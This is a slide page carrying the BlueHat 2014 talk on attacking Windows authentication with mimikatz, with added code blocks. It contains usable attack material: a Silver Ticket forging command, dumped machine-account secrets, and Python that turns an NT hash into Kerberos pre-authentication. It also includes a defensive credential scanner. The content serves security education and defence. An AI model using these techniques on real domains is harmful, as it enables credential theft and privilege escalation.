mimikatz @ sthack
 
mimikatz @ ossir
mimikatz @ ossirmimikatz @ ossir
mimikatz @ ossir
 
mimikatz @ asfws
mimikatz @ asfwsmimikatz @ asfws
mimikatz @ asfws
 
mimikatz @ phdays
mimikatz @ phdaysmimikatz @ phdays
mimikatz @ phdays
 

Recently uploaded

A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesMuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesManik S Magar
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxfnnc6jmgwh
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024TopCSSGallery
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Alkin Tezuysal
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Kaya Weers
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesBernd Ruecker
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkPixlogix Infotech
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS:  6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS:  6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integrationmarketing932765
 

Recently uploaded (20)

A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesMuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architectures
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App Framework
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS:  6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS:  6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
 

BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploitation

6. A More Realistic View - Environment
Heterogeneous environments
Mix of Linux / Unix / Windows on the server side
– License costs prohibitive if not bundled with server hardware
– Virtualization makes spinning up new servers quick and easy
  • license costs can grow quickly as well
Desktops are often a mix of various flavors of Windows
– Some OSX / Macs as well
Unix authentication sometimes integrated with Active Directory
– LDAP

7. The Realistic View - Patching
Patching is inconsistent
– Especially 3rd-party software
  • Java / Acrobat Reader
Some services will be patched quickly
Some services on ‘don’t touch’ lists
Patching usually inversely proportional to the criticality of the system

8. The Realistic View - Desktop
Most enterprises are still transitioning from XP to Windows 7
– Licenses are expensive and often paired with hardware upgrades
None of the enterprises we’ve seen use 8.1
– Most enterprises have decided to see what happens with 10+ (XP approach)
Some places still have 2000 or NT and older
– See @Viss scan of the internet
– Shodan HQ

9. The Realistic View - Office
Mix of Office 2007 / 2010 in use
– with a lot of VBA ;)
Little incentive to upgrade
– Making stuff more “cloud capable” causes issues in many enterprises
  • 3rd party doctrine regarding information remaining private / confidential
  • Ownership issues
  • Technology has evolved, laws haven’t caught up

10. The Realistic View – Server OS
Many places still run 2003 domain functional level and are only now transitioning to 2008 / 2008R2
Most Windows servers are running 2008 / 2008R2
Server 2003 being transitioned away from due to EOL
Server 2012 / 2012R2 has some traction
Criticality of server determines upgrades
– More critical, less likely

11. The Realistic View - Other Server Software
SQL server
– Whatever version the developer / app wanted to use when installed
– Usually multiple versions at the same time
– If the app works, little incentive to upgrade
Exchange
– 2007 or 2010
– Not a lot of incentive to upgrade since it’s viewed as critical infrastructure
SharePoint
– 2007 or 2010
– Not a lot of incentive to upgrade depending on usage

12. The Net Result?
New features for the latest software will not be present in the average environment
Most enterprises will not regard a new security feature to be worthy of upgrading the platform
It could be 5+ years before some features will be seen in the average environment

13. Attackers in the Real World (1)
“Real World” attack knowledge suffers from research bias
– Sometimes we only find what we’re looking for
– Once we find something in the past, we tend to look for that first the next time
– New or novel attacks go unnoticed for years
Attackers are less interested in being disruptive
Attackers are more interested in gaining access to corporate data
– Domain / enterprise admin usually not the ultimate goal
– Usually a checkpoint along the way to find the people with access to the goods
– Possible with targeted attacks to never touch any privileged accounts
  • Example: Target devs or HR

14. Attackers in the Real World (2)
Most discovered attacks don’t involve 0-day exploits
– 0-days are expensive
– More difficult to discover post-attack
– Likely only required for hardened targets
Most breach responders overestimate their defensive capabilities, therefore overestimate attacker capabilities

15. Attackers in the Real World (3)
Client-side attacks combined with social engineering are the most likely vectors
– Everybody clicks on dancing cats
– Email addresses are easy to collect or figure out
– Client-side vulnerabilities appear to be more plentiful
– Some products have come a long way: IE with EMET
– Some still have a ways to go: Java / Flash / Acrobat Reader
– Recentish breaches give attackers access to employees’ social networks
  • Easier to create more legit looking context
Use an exploit to start, then depend on bad architecture to work deeper

16. Attackers in the Real World (4)
After initial compromise, attackers will take their time on post-exploitation
– Targeted information sought
  • Client lists
  • Source Code
  • Schematics
  • Financial Information
  • Credit card info / PII / PHI
  • Private keys / certificates / code signing certs
Attackers usually have weeks to months
– Detection usually takes months based on the latest Verizon report
  • http://www.verizonenterprise.com/DBIR/

17. Post-exploitation Techniques (1)
An entirely different talk
A few highlights
– Group Policy Preferences
  • Anybody with access to DC could recover any credentials set with GPP
  • Potentially allows elevation in automation scripts
  • ~Patched with MS14-025
– Plaintext credentials in automation scripts
  • Mount a share somewhere, copy stuff
– Service accounts
  • Tend to be privileged with easy-to-guess passwords that haven’t changed in years

18. Post-exploitation Techniques (2)
Poorly configured file shares
– Password lists
  • Search for ‘password.txt’
– Backups of critical infrastructure / configs
– Unattended installers
  • If it automagically joins the domain, there’s a password somewhere
Poorly configured SharePoint
– Use the search functionality to find password lists and config files
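Slides 17 and 18 come down to the same defensive chore: credentials left in files that every domain user can read. The Python below is an added example (not from the talk, not a mimikatz or PowerSploit component) that walks a share and reports GPP XML carrying a cpassword attribute, unattend files with a plaintext Password element, and password.txt files; it builds its own constructed sample tree so it runs offline. MS14-025 stops new cpassword entries from being written but does not delete the ones already in SYSVOL, which is why a scan like this still finds them.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample files: the cpassword and password values are placeholders, not real data.
GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin" changed="2014-10-10 12:00:00">
    <Properties action="U" userName="LocalAdmin" cpassword="CONSTRUCTED-NOT-A-REAL-VALUE" neverExpires="1"/>
  </User>
</Groups>
"""

UNATTEND_XML = """<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>CONSTRUCTED-PASSWORD</Value><PlainText>true</PlainText></Password>
        <Username>Administrator</Username>
      </AutoLogon>
    </component>
  </settings>
</unattend>
"""

CLEAN_XML = """<?xml version="1.0" encoding="utf-8"?>
<Drives><Drive name="H:"><Properties action="U" path="\\\\files01\\home"/></Drive></Drives>
"""


def _local(tag: str) -> str:
    """Strip an XML namespace prefix such as {urn:schemas-microsoft-com:unattend}."""
    return tag.rsplit("}", 1)[-1]


def scan_for_embedded_credentials(root: str) -> list:
    """Walk a share (SYSVOL, a deployment share) and return (relative path, reason) tuples."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name.lower() == "password.txt":
                findings.append((rel, "password list by file name"))
                continue
            if not name.lower().endswith(".xml"):
                continue
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue
            for el in tree.iter():
                # Group Policy Preferences: cpassword is AES-encrypted with a published key,
                # so any readable cpassword is a recoverable password.
                if el.attrib.get("cpassword"):
                    findings.append((rel, f"GPP cpassword in <{_local(el.tag)}>"))
                # Unattended setup: <Password><Value>...</Value><PlainText>true</PlainText></Password>
                if _local(el.tag) == "Password":
                    kids = {_local(k.tag): (k.text or "").strip() for k in el}
                    if kids.get("Value") and kids.get("PlainText", "").lower() == "true":
                        findings.append((rel, "unattend plaintext <Password>"))
    return sorted(findings)


def build_sample_share() -> str:
    """Create a throwaway directory shaped like SYSVOL plus an install share (constructed data)."""
    root = tempfile.mkdtemp(prefix="sysvol-sample-")
    layout = {
        "Policies/{GUID-1}/Machine/Preferences/Groups/Groups.xml": GROUPS_XML,
        "Policies/{GUID-2}/User/Preferences/Drives/Drives.xml": CLEAN_XML,
        "Deploy/unattend.xml": UNATTEND_XML,
        "IT/password.txt": "constructed placeholder\n",
    }
    for rel, body in layout.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, reason in scan_for_embedded_credentials(build_sample_share()):
        print(f"{reason:32s} {rel}")
```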
  • 19. Post-exploitation Tools (1) Attackers have a wide variety of tools they can use Many are legit tools being used nefariously – PowerShell • Allows access to WINAPI / entire .NET framework • Can be used to bypass even the most mature application whitelisting products • Trivial AV bypass – SysInternals • Why not do ‘bad things’ with Microsoft signed binaries? • PsExec, AdExplorer, ProcDump, and others 10/10/2014 Chris, Ben & Skip @ BlueHat Reality Bites - The Attacker’s View of Windows Authentication and Post-exploitation 19
  • 20. Post-exploitation Tools (2) NT Resource Kit – Many useful utilities that are now built-in commands – sc, dnsquery, etc – srvany – make any program a service Built-in commands – net.exe, cmd.exe, netsh.exe Some tools are really only useful for post-exploitation – mimikatz 10/10/2014 Chris, Ben & Skip @ BlueHat Reality Bites - The Attacker’s View of Windows Authentication and Post-exploitation 20
  • 21. mimikatz (1) Designed by Benjamin to learn more about Windows programming – Seriously – We aren’t joking Exposed several issues with plaintext passwords being stored in memory – Passwords being stored in LSASS by various SSP • WDigest and others – Partially fixed by Microsoft – Passwords will be back in LSASS if users need certain SSO – Third party SSP still have access to passwords • RSA for example • mimikatz rolled its own as well 10/10/2014 Chris, Ben & Skip @ BlueHat Reality Bites - The Attacker’s View of Windows Authentication and Post-exploitation 21
• 22. mimikatz (2)
Can recover keys / hashes for accounts in memory
Can be used to implement pass-the-hash attacks
– PTH = using hashes as password equivalents
– NTLM is DESIGNED this way
– The Windows OS itself uses PTH
  • The NTLM security package only keeps the hash in memory
[Diagram: LM and NTLM (MD4) hashes of an account, e.g. NTLM cc36cf7a8514893efccd332446158b1a, as held by LSASS]
• 23. mimikatz (3)
Can be used to implement Kerberos attacks
– Can recover a user's Kerberos tickets
  • Both TGTs and service tickets
– Can insert tickets into LSASS for use
  • Using a native Windows API (LsaCallAuthenticationPackage, KerbSubmitTicketMessage)
– Can upgrade an NTLM hash to a Kerberos ticket
  • This is "overpass-the-hash"
  • Introduced at Black Hat USA 2014
  • Also works with recovered AES keys on the client side
[Diagram: keys held by LSASS (kerberos) for the « chocolate.local » domain: des_cbc_md5, rc4_hmac_nt (= the NTLM/MD4 hash, cc36cf7a8514893efccd332446158b1a), aes128_hmac, aes256_hmac. Any one of them yields a TGT from the KDC; the TGT then drives ③ TGS-REQ / ④ TGS-REP for a service ticket (TGS) and ⑤ its usage]
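The two facts slides 22 and 23 rest on, as an added example (this is not code from the talk or from mimikatz): the NT hash is unsalted MD4 over the UTF-16LE password, and those same 16 bytes are the rc4_hmac_nt Kerberos key, so whoever holds the hash can produce a valid RC4-HMAC pre-authentication blob for an AS-REQ without ever knowing the password. MD4 is written out because hashlib on OpenSSL 3 builds often lacks it; the RC4-HMAC profile follows RFC 4757. The timestamp bytes and the password are constructed; a real request ASN.1-encodes the timestamp first.

```python
"""NT hash == rc4_hmac_nt key: the mechanics of pass-the-hash and overpass-the-hash.
Added example, not from the talk or mimikatz. MD4 per RFC 1320, RC4-HMAC per RFC 4757."""
import hmac
import os
import struct

_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; returns the 16-byte digest."""
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (mixing function, additive constant, shifts, word schedule)
        (lambda x, y, z: (x & y) | (~x & z), 0, (3, 7, 11, 19), lambda i: i),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         lambda i: (i % 4) * 4 + i // 4),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         lambda i: (0, 2, 1, 3)[i // 4] + (0, 8, 4, 12)[i % 4]),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = list(state)
        for fn, k, shifts, word in rounds:
            for i in range(16):
                t = (4 - i % 4) % 4  # target register rotates a, d, c, b
                p, q, r = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
                v[t] = _rotl((v[t] + fn(p, q, r) + x[word(i)] + k) & _MASK, shifts[i % 4])
        state = [(s + w) & _MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)). Unsalted, hence a password equivalent."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA) keystream XOR."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _rc4_hmac_k1(key: bytes, usage: int) -> bytes:
    usage = {3: 8, 9: 8, 23: 13}.get(usage, usage)  # RFC 4757 usage remapping
    return hmac.new(key, struct.pack("<I", usage), "md5").digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes = None) -> bytes:
    """Kerberos etype 23: checksum || RC4(K3, confounder || plaintext). K2 == K1 here."""
    k1 = _rc4_hmac_k1(key, usage)
    body = (confounder or os.urandom(8)) + plaintext
    checksum = hmac.new(k1, body, "md5").digest()
    k3 = hmac.new(k1, checksum, "md5").digest()
    return checksum + rc4(k3, body)


def rc4_hmac_decrypt(key: bytes, usage: int, blob: bytes) -> bytes:
    """Inverse of rc4_hmac_encrypt; raises ValueError on a wrong key or tampering."""
    k1 = _rc4_hmac_k1(key, usage)
    checksum, body = blob[:16], blob[16:]
    plain = rc4(hmac.new(k1, checksum, "md5").digest(), body)
    if not hmac.compare_digest(hmac.new(k1, plain, "md5").digest(), checksum):
        raise ValueError("checksum mismatch: wrong key or altered ciphertext")
    return plain[8:]  # drop the confounder


def pa_enc_timestamp_from_hash(nt: bytes, timestamp: bytes) -> bytes:
    """Overpass-the-hash in one call: key usage 1 is PA-ENC-TIMESTAMP in the AS-REQ,
    and the 'key' is nothing but the NT hash (timestamp bytes are a constructed stand-in)."""
    return rc4_hmac_encrypt(nt, 1, timestamp)


if __name__ == "__main__":
    h = nt_hash("password")
    print("NT hash / rc4_hmac_nt key:", h.hex())  # 8846f7eaee8fb117ad06bdd830b7586c
    blob = pa_enc_timestamp_from_hash(h, b"20141010120000Z")
    print("KDC-side decrypt with the same key:", rc4_hmac_decrypt(h, 1, blob))
```

The same hash is accepted by the NTLM authentication path (pass-the-hash) and by the Kerberos RC4-HMAC path (overpass-the-hash); the only difference on the wire is which protocol carries it, which is why disabling NTLM alone does not retire stolen NT hashes.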
• 24. Demo! New version of mimikatz, on a new version of Windows, in front of Microsoft staff
• 25. mimikatz :: Golden Tickets (1)
Can be used to implement Golden Ticket attacks
– Needs the KRBTGT hash/keys, which get lost via:
  • Domain dump
    – Password audit (legitimate use case)
    – Poorly redacted pentest report
  • Other
    – Compromise
    – File backup of the domain controller
      • Shadow copy trick (ntds.dit plus the SYSTEM hive from a VSS snapshot)
      • Recovery of backup tapes, or access to the backup file share
    – Compromise of the virtual machine infrastructure
      • Copy the drive image or a snapshot of the image
• 26. mimikatz :: Golden Tickets (2)
Made worse by KRBTGT rarely changing
– Only changes during the domain functional level upgrade from NT5 -> NT6
  • 2000/2003 to 2008/2012
  • 2008 -> 2012 doesn't change the value
  • The previous key (n-1) stays valid...
– Means the age of the hash in the average operational environment is measured in YEARS
  • Check yours: the krbtgt account's pwdLastSet attribute tells you when it was last changed
• 27. mimikatz :: Golden Tickets (3)
The KRBTGT hash can be used to generate arbitrary TGTs
– Can make the user a member of any group, even make it multiple users!
  • Even users and SIDs that do not exist
– The KDC only re-checks the account once a TGT is more than 20 minutes old, so a TGT for a nonexistent or disabled account gets service tickets during its first 20 minutes; any service tickets obtained are good for 10 hours by default
  • Any account can create / use a spoofed ticket; it doesn't require elevated rights
– Can be used to bypass account restrictions
  • Disabled / expired
  • Authentication silos
  • "Protected Users" is just a group SID in the TGT
– Create a trail of false events
  • Incident handlers rely on event logs
  • Easy to frame another user
• 28. Demo!
• 29. mimikatz :: BlackHat erratum
At BlackHat, we announced that to forge a TGS we need 2 keys:
– krbtgt key
– target key
The krbtgt key is needed to sign the PAC, to prevent alterations
– But how can a remote service check this signature without the key?
  • Remember? Kerberos is SYMMETRIC
– Easy: it delegates PAC checks to the KDC...
• 30. mimikatz :: BlackHat erratum
"Windows 2000 Server and Windows XP do not validate the PAC when the application server is running under the local system context or has SeTcbPrivilege [...]

Windows Server 2003 does not validate the PAC when the application server is running under the local system context, the network service context, or has SeTcbPrivilege. [...]

Windows Server 2003 with SP1 does not validate the PAC when the application server is under the local system context, the network service context, the local service context, or has SeTcbPrivilege privilege. [...]

Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2 do not validate the PAC by default for services. Windows still validates the PAC for processes that are not running as services. PAC validation can be enabled when the application server is not running in the context of local system, network service, or local service; or it does not have SeTcbPrivilege [...]"
http://msdn.microsoft.com/library/cc224027.aspx#id2
• 31. mimikatz :: Silver Tickets (1)
So "in real life" a TGS only needs the target key... no classic service will check the signature... Let's call them: Silver Tickets!

Ticket type | Default lifetime | Min. number of KDC accesses | Multiple targets | Available with smart card | Realtime check for restrictions (account disabled, logon hours...) | Protected Users check for encryption (RC4/AES) | Can be found in | Is funky
Normal | 42 days | 2 | Yes | Yes | Yes | Yes | n.a. | No
Overpass-the-hash (pass-the-key) | 42 days | 2 | Yes | No | Yes | Yes | Active Directory, client memory | No (ok, a little ;))
Pass-the-ticket (TGT) | 10 hours | 1 | Yes | Yes | No (only after 20 min) | No | Client memory | Yes
Pass-the-ticket (TGS) | 10 hours | 0 | No | Yes | No | No | Client memory | Yes
Silver ticket | [30;60] days | 0 | No | Yes | No | No | n.a. | Yes
Golden ticket | 10 years | 1 | Yes | Yes | No (we can cheat) | No | n.a. | Fuck, yes!
• 32. mimikatz :: Silver Tickets (2)
How do we make a Silver Ticket?
– Exactly like a Golden Ticket, but without the krbtgt key
– Target name (server FQDN)
– Service name
– We must have the "target key"
  • From client memory
  • From Active Directory (ok, then we can make a Golden Ticket ;)
  • ...or from the registry (even offline!)

mimikatz # lsadump::secrets
Domain : CLIENT
SysKey : 5418b222b48866feea6f633efcf8417d

Policy subsystem is : 1.13
LSA Key(s) : 1, default {13e98d1c-c7d5-1099-6477-5dbbed69ec73}
  [00] {13e98d1c-c7d5-1099-6477-5dbbed69ec73} c2e2ee5bfeb6a4fd4f58ab8554c42a585a093b116ee8ce830ee227e0c31071a4

Secret : $MACHINE.ACC
cur/NTLM:1acf72e4e8a2d6209fe96920ff800110/text: ,QK@Y+i$ nA9BCcrRvnPsaWE/m3_h?U+U^3AL-LF!_ 8y<2.xH>'^F;>OA.(9v9!(_[=51Pj_]YqKV!5`LIsk=*F`q-/dP:kP))bDhA'!2R/x#u=)O$2W0me
• 33. mimikatz :: Silver Tickets (3)
Before that, who cared about this computer password?
– No... really?
– Yeah, same story as for the krbtgt account
– At least, this time the password changes every 30 days by default...
  • But n-1 is still valid (hence [30;60] days)... and the password keeps working if it was never changed...
$MACHINE.ACC is the new krbtgt, localized to one computer
– And it's in the registry (the SECURITY hive, as an LSA secret)
A Silver Ticket is the new Golden Ticket, localized to a target/service
When a service account is linked to a Kerberized service, it can cover multiple targets (see its SPNs)
– Good chances you can find its password in the registry too (service account passwords are LSA secrets as well) ;)
• 34. mimikatz :: Silver Tickets (4)
Kerberos services rely on SPNs
– Nobody likes to set up SPNs (like MIT Kerberos)
– That's why Microsoft made it ~easy for you (like MIT Kerberos)
The host SPN is not only for "host"; it is an alias for:
alerter, appmgmt, cisvc, clipsrv, browser, dhcp, dnscache, replicator, eventlog, eventsystem, policyagent, oakley, dmserver, dns, mcsvc, fax, msiserver, ias, messenger, netlogon, netman, netdde, netddedsm, nmagent, plugplay, protectedstorage, rasman, rpclocator, rpc, rpcss, remoteaccess, rsvp, samss, scardsvr, scesrv, seclogon, scm, dcom, cifs, spooler, snmp, schedule, tapisrv, trksvr, trkwks, ups, time, wins, www, http, w3svc, iisadmin, msdtc
• 35. mimikatz :: Silver Tickets (5)
kerberos::golden
  /domain:blue.local                              <= domain name
  /sid:S-1-5-21-4174036629-1679296857-797215250   <= domain SID
  /rc4:1acf72e4e8a2d6209fe96920ff800110           <= NTLM/RC4 key of the target/service (here the $MACHINE.ACC secret dumped above)
  /target:client.blue.local                       <= target FQDN
  /service:cifs                                   <= service name
  /user:Administrator                             <= username you want to be
  /id:500                                         <= RID of the username (500 is THE domain Administrator)
  /groups:513,512,520,518,519                     <= group RIDs for the user (Domain Users, Domain Admins, Group Policy Creator Owners, Schema Admins, Enterprise Admins; be imaginative)
  /ticket:cifs.client.kirbi                       <= the ticket filename (or /ptt to inject it straight into the session)
• 36. Demo! New version of mimikatz, on a new version of Windows, in front of Microsoft staff, with new features
• 37. mimikatz :: Bonus
mimikatz is full of love for pentesters, but we can't show it all!
– We are modest
A little driver to bypass Protected Process
– For example, to get around RunAsPPL for LSASS
AddSid
– An experimental function to add the SID of a user/group to another user in Active Directory (admin without being in an admin group)
